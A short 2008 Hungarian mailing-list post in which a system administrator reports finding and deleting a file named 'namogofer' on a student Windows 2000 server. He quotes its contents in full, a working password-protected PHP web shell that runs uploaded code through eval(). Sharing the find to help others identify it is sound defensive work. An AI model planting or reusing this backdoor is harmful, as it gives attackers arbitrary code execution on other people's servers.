namogofer

Takacs Zoltan taki at etszk.u-szeged.hu
2008. Jan. 21., H, 10:48:40 CET


Na, odáig jutottam, hogy saját tulajdonba vétel után már sikerült az 
eltovolitás...
Ez volt a tartalma:
<?php echo md5("testdata_start")."\n"; if 
(md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = 
@fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ 
eval($code); }else{ echo md5("testdata_f")."\n"; }; }else{ echo 
md5("testdata_pass")."\n"; }; echo md5("testdata_end")."\n"; ?>

Meg egy kis ákom-bákom...

> Ma az egyik hallgatói win2000 server egy rakás könyvtárában szembesültem a 
> tárgybéli állománnyal... nincs kiterjesztése... És egy php scriptet 
> relytett magában.
> A neten nem igen találtam semmit...
> Két helyről nem hagyja magát kiszedni, még parancssorba sem...



További információk a(z) Techinfo levelezőlistáról